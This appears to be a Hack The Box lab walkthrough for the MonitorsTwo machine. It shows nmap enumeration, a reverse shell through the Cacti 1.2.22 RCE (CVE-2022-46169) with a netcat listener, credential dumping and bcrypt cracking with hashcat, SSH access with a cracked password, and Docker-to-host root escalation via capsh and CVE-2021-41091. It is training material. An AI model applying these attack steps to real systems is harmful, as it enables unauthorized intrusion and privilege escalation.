MonitorsTwo is an Easy-difficulty Linux machine on Hack The Box that offers a comprehensive exploration of various vulnerabilities and misconfigurations. It starts off with a web application that is vulnerable to an unauthenticated remote code execution through a malicious X-Forwarded-For header with cacti v1.2.22 (CVE-2022-46169). This shell provides access to a Docker container which has a misconfigured /sbin/capsh binary with the SUID Byte as well as MySQL credentials that are used to dump & user hashes for SSH access to the host machine. On this host, an outdated version of docker allows a lower privileged user leverage the root access of a container to copy a SUID binary leading to privilege escalation on the host (CVE-2021-41091).

Enumeration

The first step in attacking any machine is information gathering process. For this, I used nmap to collect all open ports and running services.

nmap -sCV -p- monitorstwo.htb -oA m2cv-scan

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The -sCV is a tag in nmap that is shorthand for ‘-sC -sV’. -sC uses a default set of scripts utilizing the Nmap Scripting Engine (NSE) gathering additional information about services, potential vulnerabilities, and misconfigurations, -sV is a version/service detector that attempts to identify services running on open ports, and -p- scans all 65,535 ports.

The results indicate two open ports:

Port 22 (SSH) – OpenSSH 8.2p1

Port 80 (HTTP) – Running an Nginx server with Cacti installed

Web Exploitation – CVE-2022-46169 (Cacti RCE)

Next, visiting http://monitortwo.htb shows the Cacti 1.2.22 login page.

A quick google search show Exploit-DB and Github pages revealing an unauthenticated RCE vulnerability in Cacti v1.2.22 affecting the X-Forwarded-For header.

Searching via Searchsploit, I was able to locate a python module for MetaSploit. Rapid 7 has also posted this exploit for cacti 1.2.22 Unauthenticated Remote Code Execution (RCE) Here:

Instead of Metasploit, I used a manual Python proof-of-concept to better align with OSCP methodology:

CVE-2022-46169-CACTI-1.2.22

Catching a Reverse Shell

python3 exploit.py --url http://monitorstwo.htb --rhost YOUR_IP --lport YOUR_PORT

The arguments of this POC takes the url of the vulnerable host (-u http://monitorstwo.htb) and the localhost & port of which I am sending the shell to (–LHOST=10.10.14.5 –LPORT=443)

Before the exploit is run, I need a listener on my kali machine to catch a shell. For this i used `nc -lvnp 443`. 443 is the port nc is listening on which is also commonly used for HTTPS. Hosting a listener on this port provides a hint of stealth to exploitation process.

Before running the script, I start a listener on my attacker machine

sudo nc -lvnp YOUR_PORT

Once executed, this gives a reverse shell as www-data inside a Docker container. The name of this machine is alphanumeric which leads me to believe it is a docker container.

Docker Container Enumeration

Here, I opted for automatic enumeration of the container via linpeas uploaded via a python http server.

In the root directory of this machine is entrypoint.sh. Taking a look at the inside of this, mySQL commands & credentials are revealed.

I copy the command to see all of the tables & identify a user_auth table. The follow up command to this is to SELECT * FROM user_auth. In this table I find db hashes through modifying the mysql command shown in entrypoint.sh

Cracking the MySQL Hash

This gets cracked instantly through one of my favorite websites, hashes.com

What if the hash is not found on this website?

It is also common to crack this hash manually via John the Ripper or Hashcat. First, the hash needs to be identified to a specific algorithm & is then ran against password lists or rainbow tables.

Identifying the Hash Type

Hash Identifier on hashes.com & cross referencing with Hashcat

Both of these resources identify the hash as bcrypt blowfish.

Digesting this command:

hashcat -m 3200 marcus.hash /usr/share/wordlists/rockyou.txt

-m 3200 sets the hash mode, unique to different types of hashes.
marcus.hash is a file that contains only the hash
/usr/share/wordlists/rockyou.txt is the path to my list of passwords.

SSH Access & Host Escalation

Logging in SSH as Marcus – funkymonkey

Once I am logged into Marcus’ account on MonitorsTwo, there is a ‘ You have mail.’ notification. In common distributions of Linux, mail is found in the /var/mail directory

This email shows 3 CVE’s, and my hunch is that the docker container can be exploited. First, I will try the CVE related to docker.

Following this guide:

https://github.com/UncleJ4ck/CVE-2021-41091

I confirmed the presence of /sbin/capsh with the SUID bit set. Then, I leveraged it to spawn a root shell:

Within docker I run this command found on gtfobins

capsh --gid=0 --uid=0 --

For this exploit to work, I first set the SUID byte on the bash executable within the docker container. In simple terms, this means that anyone who runs /bin/bash inside the MonitorsTwo container will inherit the file permissions from the file owner. This allows me to escalate privilege to root in this docker container by spawning a bash shell

This successfully escalated privileges to root, granting full control over MonitorsTwo.

Conclusion

MonitorsTwo is a fantastic practice machine that simulates a real-world attack chain—from unauthenticated web RCE to Docker escape and host root access. Key takeaways include:

Exploiting CVE-2022-46169 via custom headers
Using Docker misconfigurations to pivot
Cracking MySQL hashes for lateral movement
Escalating privileges via CVE-2021-41091

HTB: MonitorsTwo Walkthrough